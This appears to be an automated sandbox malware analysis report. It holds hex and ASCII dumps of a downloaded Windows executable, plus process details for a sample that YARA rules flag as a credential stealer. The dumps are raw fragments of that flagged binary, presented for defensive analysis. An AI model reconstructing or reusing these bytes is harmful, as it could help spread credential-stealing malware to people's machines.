                                                                                                                                            2024-12-23 16:20:46 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                            2024-12-23 16:20:46 UTC438INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                            Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                            2024-12-23 16:20:47 UTC16384INData Raw: 7d 0c 0b 04 00 00 75 32 a1 68 1d 44 00 3b c3 74 07 50 ff 15 2c 90 40 00 a1 6c 1d 44 00 3b c3 74 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff
                                                                                                                                            Data Ascii: }u2hD;tP,@lD;tP0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'
                                                                                                                                            2024-12-23 16:20:47 UTC1024INData Raw: 00 00 48 00 69 00 64 00 65 00 57 00 69 00 6e 00 64 00 6f 00 77 00 00 00 00 00 50 00 6f 00 70 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73
                                                                                                                                            Data Ascii: HideWindowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s
                                                                                                                                            2024-12-23 16:20:47 UTC16384INData Raw: 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28
                                                                                                                                            Data Ascii: CreateDirectory: can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (
                                                                                                                                            2024-12-23 16:20:47 UTC1024INData Raw: c2 94 29 53 54 f9 01 29 4f 36 46 8d e8 c7 e6 52 b1 3a d6 d7 02 ab 3a 7c 39 58 c5 d6 e5 20 f1 ec 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba
                                                                                                                                            Data Ascii: )ST)O6FR::|9X 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07
                                                                                                                                            2024-12-23 16:20:47 UTC1749INData Raw: 36 6c d8 a0 d8 b8 71 63 33 36 6d da d4 c8 e6 cd 9b 1b d9 b2 65 8b 42 be 6f dd ba 55 21 d3 b7 6d db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36
                                                                                                                                            Data Ascii: 6lqc36meBoU!m/od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.6
                                                                                                                                            2024-12-23 16:20:47 UTC16384INData Raw: f3 f4 e5 2c fa 8b d6 6e a0 f9 db f7 d0 9b cc 4a 88 37 9b 81 b5 cb 97 d9 92 b5 3d 81 9b 49 5f 84 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77
                                                                                                                                            Data Ascii: ,nJ7=I_AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw
                                                                                                                                            2024-12-23 16:20:47 UTC1024INData Raw: a7 8e 1e 9c 40 02 bb 31 29 24 25 52 1a 27 ce 34 4e 62 c1 bb bd 69 f3 73 33 69 41 bb a7 99 27 79 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2
                                                                                                                                            Data Ascii: @1)$%R'4Nbis3iA'y|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>
                                                                                                                                            2024-12-23 16:20:47 UTC16384INData Raw: f3 34 9e a7 37 ca 6c 39 b9 e9 d4 0d 8e 25 5a ee e8 d2 c7 6d e2 6e 1e ee e4 e6 ee a6 04 7f d3 d2 f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65
                                                                                                                                            Data Ascii: 47l9%ZmnzRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}|W Qp9Rx@*Y%X$=x$Fqx.v*e


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:11:20:15
                                                                                                                                            Start date:23/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\fr2Mul3G6m.exe"
                                                                                                                                            Imagebase:0x240000
                                                                                                                                            File size:2'935'296 bytes
                                                                                                                                            MD5 hash:5BB8A1264DF6A69E4B6118482039C003
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1431492367.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1429087929.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:11:20:50
                                                                                                                                            Start date:23/12/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2000
                                                                                                                                            Imagebase:0xb50000
                                                                                                                                            File size:483'680 bytes
                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            No disassembly